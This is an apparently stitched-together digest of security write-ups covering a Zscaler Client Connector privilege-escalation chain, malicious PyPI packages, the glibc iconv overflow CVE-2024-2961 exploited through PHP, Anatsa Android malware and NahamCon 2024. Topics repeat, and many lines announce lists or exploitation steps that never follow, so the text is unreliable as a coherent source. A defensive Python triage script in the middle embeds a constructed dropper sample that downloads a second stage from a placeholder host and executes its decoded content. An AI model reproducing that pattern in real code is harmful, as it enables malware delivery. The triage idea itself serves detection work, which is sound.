Zero-Interaction Local Privilege Escalation in Zscaler Client Connector
A critical security issue was discovered in the Zscaler Client Connector, enabling a zero-interaction local privilege escalation. By chaining together several low-level vulnerabilities, attackers could escalate privileges and execute arbitrary commands as the NT AUTHORITY\SYSTEM service account on Windows. The vulnerabilities involved:
Exploitation was achieved through bypassing RPC validation checks, password check bypass, path traversal for arbitrary file execution, and DLL hijacking.
Discovery of a New Cluster of Malicious PyPI Packages
A new cluster of malicious packages was identified in the Python Package Index (PyPI) repository. These packages were designed to exfiltrate sensitive information, install backdoors, and perform other malicious activities upon installation. The discovery highlights the growing threat of supply chain attacks targeting open-source repositories. Key findings include:
Recommendations include verifying package integrity, using trusted sources, and employing static and dynamic analysis tools to detect malicious behavior.
Exploiting an Ancient Iconv Buffer Overflow Vulnerability in PHP
An ancient buffer overflow vulnerability reachable through PHP’s iconv extension was rediscovered; it lives in the underlying iconv() implementation and affects versions that support certain character sets. The vulnerability could allow remote code execution if exploited under specific conditions. Technical details include:
Proof-of-concept exploits demonstrate the feasibility of the attack and underscore the importance of updating and patching legacy systems.
Analysis of Anatsa (TeaBot) Malware Campaigns in Google Play Store by Zscaler ThreatLabz
Zscaler ThreatLabz conducted an in-depth analysis of Anatsa (TeaBot) malware campaigns in the Google Play Store. Anatsa is a banking trojan targeting Android devices with sophisticated capabilities. Key observations include:
A critical security flaw, CVE-2024-2961, has been discovered in the GNU C Library (glibc), specifically in its iconv() function. Threat actors can exploit it to achieve remote code execution (RCE) on affected systems. With a CVSS score of 8.8, the flaw is rated highly severe, reflecting the risk it poses to system integrity and security.
The vulnerability resides in the iconv() function of glibc’s iconv library, which converts text between character encodings. The issue specifically affects conversions involving the ISO-2022-CN-EXT character set. When converting from the UCS4 charset, iconv() must emit escape sequences to signal a change of charset. The code does not check the remaining space in its output buffer before writing them, so it can write up to three bytes beyond the end of the buffer.
Security researcher Charles Fol from Ambionics has provided a detailed analysis of this buffer overflow vulnerability. The overflow can be triggered in PHP applications through two primary methods:
Due to the structure of PHP’s heap, this overflow can be exploited to modify part of a free list pointer, ultimately enabling an arbitrary write primitive within the program’s memory. Consequently, an attacker with a file read vulnerability and a controlled prefix on a PHP application can achieve RCE. Similarly, forcing PHP to call iconv() with controlled parameters grants the attacker the same capability.
Proof-of-Concept (PoC) Exploit
The proof-of-concept exploit for CVE-2024-2961 involves a series of three requests, which demonstrate the steps an attacker might take to leverage this vulnerability for executing arbitrary commands on the target system:
As part of our ongoing efforts to secure the software supply chain, we continuously scan newly released PyPI and NPM packages for malicious content. This advisory details our recent identification of a particularly interesting cluster of malicious PyPI packages.
During routine triage, we identified a suspicious PyPI package named reallydonothing, published on May 9, 2024. The package exhibited several red flags:
These indicators triggered our Slack-based triage workflow, prompting further analysis by our researchers.
The package reallydonothing contained a single obfuscated Python file designed to target specific systems. It searches for a secret file whose path, when hashed, matches a predetermined value. If found, the malware downloads and executes a second-stage payload.
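As an added illustration of the static triage this advisory recommends (not the publisher’s own tooling), the following script parses a package file and flags the combination described above: a filesystem search gated on a hash of the path, followed by a download and dynamic execution. The sample file embedded in it is constructed for the test; its hash and URL are placeholders, not indicators from the advisory.

```python
import ast
from collections import Counter

# Constructed sample mimicking the described dropper shape (only parsed, never run);
# the hash and URL are placeholders, not indicators from the advisory.
SAMPLE = '''
import os, hashlib, base64, urllib.request
TARGET = "0" * 64
for root, _, files in os.walk("/"):
    for f in files:
        p = os.path.join(root, f)
        if hashlib.sha256(p.encode()).hexdigest() == TARGET:
            data = urllib.request.urlopen("http://example.invalid/stage2").read()
            exec(base64.b64decode(data))
'''

# Call categories that, in combination, match the behaviour described above.
SUSPICIOUS = {
    "filesystem_walk": {"os.walk", "os.listdir", "os.scandir"},
    "hash_compare": {"hashlib.sha256", "hashlib.md5", "hashlib.sha1"},
    "download": {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"},
    "decode": {"base64.b64decode", "zlib.decompress", "marshal.loads"},
    "dynamic_exec": {"exec", "eval", "compile"},
}

def _call_name(node):
    """Render a call target such as 'hashlib.sha256' from its AST (dotted names only)."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
        return ".".join(reversed(parts))
    return ""

def triage(source):
    """Categorise suspicious calls in a package file; flag=True when a hash-gated
    filesystem search is paired with a download or dynamic execution."""
    hits, cats = Counter(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            for cat, names in SUSPICIOUS.items():
                if name in names:
                    hits[name] += 1
                    cats.add(cat)
    gated_search = {"filesystem_walk", "hash_compare"} <= cats
    stage2 = bool({"download", "dynamic_exec"} & cats)
    return {"categories": sorted(cats), "calls": dict(hits), "flag": gated_search and stage2}
```

Run `triage()` over each file in an unpacked sdist or wheel; a True flag is a triage signal for a human analyst, not a verdict, since benign installers also download and hash.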
This report provides a technical analysis of Anatsa’s attack campaigns and an overview of recent trends in the Google Play store.
The following sequence illustrates how Anatsa malware is distributed and executed on a victim’s device:
Technical Analysis
A critical buffer overflow vulnerability has been identified in glibc’s iconv() function, present since 2000. This vulnerability, CVE-2024-2961, lets an attacker write one to three bytes past the end of a buffer, which can be exploited under specific conditions. Despite the seemingly minimal size of the overflow, its implications are far-reaching, especially when combined with file read primitives in PHP.
The vulnerability stems from improper handling of the output buffer in iconv(). Specifically, when converting to certain character sets such as ISO-2022-CN-EXT, iconv() can write more bytes than the output buffer holds, producing a buffer overflow.
The following proof-of-concept demonstrates the overflow:
$ gcc -o poc ./poc.c && ./poc
Remaining bytes (should be > 0): -1
000000: 41 41 41 41 41 1b 24 2a 48 00 00 00 00 00 00 00 AAAA A.$* H… ….
Conditions and Exploitation
For this overflow to be exploitable, two primary conditions must be met:
Initial research into potential targets identified several high-profile libraries and binaries, such as libxml2 and pkexec. While these targets were not directly exploitable due to buffer size management, they highlighted the potential risk.
Exploitation in PHP
The most promising exploitation vector involves PHP’s handling of filters and heap memory. By using the convert.iconv filter in PHP, an attacker can manipulate the memory layout and execute arbitrary code. The process involves leveraging PHP’s heap management and free list to achieve a controlled memory corruption.
Steps to Exploitation:
Recently, a series of vulnerabilities were discovered in Zscaler Client Connector, leading to a zero-interaction local privilege escalation exploit. This report outlines the discovery, exploitation, and mitigation of these vulnerabilities, which include incorrect type validation, lack of input sanitization, and arbitrary file deletion. The vulnerabilities were chained together to allow a standard user to escalate privileges and execute arbitrary commands as the NT AUTHORITY\SYSTEM service account on Windows.
CVE-2023-41969: ZSATrayManager Arbitrary File Deletion
CVE-2023-41972: Revert Password Check Incorrect Type Validation
CVE-2023-41973: Lack of Input Sanitization Leading to Arbitrary Code Execution
The vulnerabilities were chained together to achieve privilege escalation:
Zscaler Client Connector is a local desktop client used to connect to Zscaler’s network tunnels. It consists of two main processes:
These processes communicate using Microsoft Remote Procedure Call (RPC).
Vulnerability 1: ZSATrayManager Arbitrary File Deletion (CVE-2023-41969)
Discovered by Winston Ho, this vulnerability allows arbitrary file deletion through ZSATrayManager’s RPC interface. Details of this vulnerability can be found in the original Medium blog post.
Vulnerability 2: Revert Password Check Incorrect Type Validation (CVE-2023-41972)
ZSATrayManager does not properly validate the pwdType parameter in the PERFORM_APP_REVERT function, allowing attackers to bypass password checks by specifying an incorrect password type. This flaw can be exploited as follows:
NahamCon 2024 is a virtual security conference that took place from May 23 to May 25, 2024. It’s a significant event in the cybersecurity community, featuring a variety of activities including Capture The Flag (CTF) competitions, workshops, and presentations from renowned speakers in the field.
The conference schedule was packed with insightful talks covering topics such as WordPress hacking, WAF bypass techniques, and practical applications of AI in bounty hunting. Some notable presentations included:
The NahamCon CTF 2024 was a 48-hour competition that challenged participants with a range of security-related puzzles and tasks.
Participants and attendees were encouraged to share their experiences and connect with others using the hashtag #NahamCon2024 on social media platforms.
Overall, NahamCon 2024 provided a platform for security enthusiasts and professionals to learn, network, and showcase their skills in a collaborative and engaging environment.